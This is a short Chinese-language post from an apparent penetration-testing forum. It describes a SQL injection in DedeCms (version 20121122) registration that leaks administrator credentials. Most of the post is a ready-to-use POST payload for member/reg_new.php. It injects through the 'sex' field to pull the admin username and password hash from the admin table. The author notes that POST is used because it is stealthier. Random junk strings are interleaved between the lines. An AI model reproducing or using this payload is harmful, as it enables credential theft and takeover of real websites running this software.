中国网络渗透测试联盟
标题:
DedeCms SQL注射漏洞再利用
[打印本页]
作者:
admin
时间:
2012-12-5 10:03
标题:
DedeCms SQL注射漏洞再利用
dedecms版本 20121122
: o( ^8 Q4 V0 {; s
) H4 `4 B: {. }: j& {# d# P# Z
需要magic_quotes_gpc=Off
% i0 [ m( D' ], K( F
4 Z! r6 n0 u0 C' u f
应该是没有什么大危害的漏洞.
) q- G& `8 o3 j! U' _! f2 b6 ~
原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
$ Z3 G4 ^# ]% n2 t- p/ w
9 [0 s% `9 q! k3 f' }$ i, K
是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
- e1 r; T. ~( M' R8 M8 F: m- P) | _/ f
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
9 n/ t4 | p! G4 A( H. [
, n" a% @0 K4 c9 R/ r
http:///de/member/reg_new.php
/ b7 h) _. @/ w7 N9 g. R
* X& R+ H- }: P' F
POST
& R+ {/ b* K4 r2 N
: m0 D7 {0 \! }1 K
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
7 Y9 f4 s+ o% d$ P
5 A/ q7 S1 ~7 p. q
成功注册后,头像处里面有好玩的信息.
% P, o0 H8 X: ~9 ^$ J3 P$ `+ F
( T7 J4 w+ ~0 e7 C/ _
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2